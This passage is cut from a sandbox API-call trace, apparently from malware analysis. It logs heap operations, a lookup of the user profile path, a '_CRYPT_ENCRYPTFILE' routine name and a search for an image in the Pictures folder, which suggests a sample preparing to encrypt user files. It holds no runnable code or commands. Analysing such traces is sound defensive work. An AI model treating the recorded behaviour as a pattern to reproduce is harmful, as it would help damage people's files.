(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0247.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0247.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0247.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0247.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0247.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1e) returned 0x2e79338 [0247.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0247.769] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BspkZBQYHi.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0247.769] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="spkZBQYHi.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0247.769] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pkZBQYHi.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0247.769] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kZBQYHi.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0247.769] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZBQYHi.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0247.769] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BQYHi.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0247.769] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QYHi.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0247.769] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YHi.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0247.769] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hi.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0247.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0247.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0247.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0247.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0247.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0247.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0247.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0247.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0247.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0247.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0247.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0247.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0247.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0247.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0247.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0247.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0247.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0247.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0247.770] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0247.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0247.770] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0247.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0247.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0247.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0247.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d88 [0247.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0247.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0247.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0247.770] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0247.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0247.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0247.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0247.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0247.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0247.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0247.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0247.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0247.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0247.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0247.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0247.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0247.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0247.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0247.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0247.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0247.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0247.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0247.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54eb8 [0247.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0247.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0247.771] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0247.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0247.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0247.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0247.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0247.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0247.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0247.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0247.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0247.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0247.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0247.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0247.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0247.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0247.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0247.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0247.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0247.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e78 [0247.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0247.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0247.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0247.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ef8 [0247.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0247.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0247.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0247.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0247.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0247.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0247.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0247.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0247.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0247.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0247.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0247.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0247.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0247.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0247.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0247.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0247.773] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0247.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0247.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0247.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0247.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0247.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0247.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0247.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0247.774] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0247.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0247.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0247.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0247.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0247.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0247.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0247.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0247.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0247.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0247.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0247.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0247.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0247.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0247.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0247.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0247.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0247.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0247.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0247.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0247.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.775] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0247.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0247.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0247.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0247.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0247.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0247.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0247.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0247.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0247.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0247.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0247.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0247.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0247.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0247.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0247.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0247.776] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0247.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0247.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0247.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0247.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0247.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0247.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0247.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0247.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0247.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0247.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0247.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0247.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0247.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0247.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0247.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0247.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0247.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0247.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0247.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0247.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.777] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/BspkZBQYHi.bmp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917da530, ftCreationTime.dwHighDateTime=0x1d5e2bb, ftLastAccessTime.dwLowDateTime=0x59405080, ftLastAccessTime.dwHighDateTime=0x1d5ec9f, ftLastWriteTime.dwLowDateTime=0x59405080, ftLastWriteTime.dwHighDateTime=0x1d5ec9f, nFileSizeHigh=0x0, nFileSizeLow=0x48e1, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="BspkZBQYHi.bmp", cAlternateFileName="BSPKZB~1.BMP")) returned 0xa87410 [0247.777] FindClose (in: hFindFile=0xa87410 | out: hFindFile=0xa87410) returned 1 [0247.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0247.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0247.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0247.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0247.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0247.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0247.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0247.777] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0247.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0247.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0247.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0247.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0247.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0247.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0247.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0247.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0247.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0247.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0247.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0247.778] HeapFree 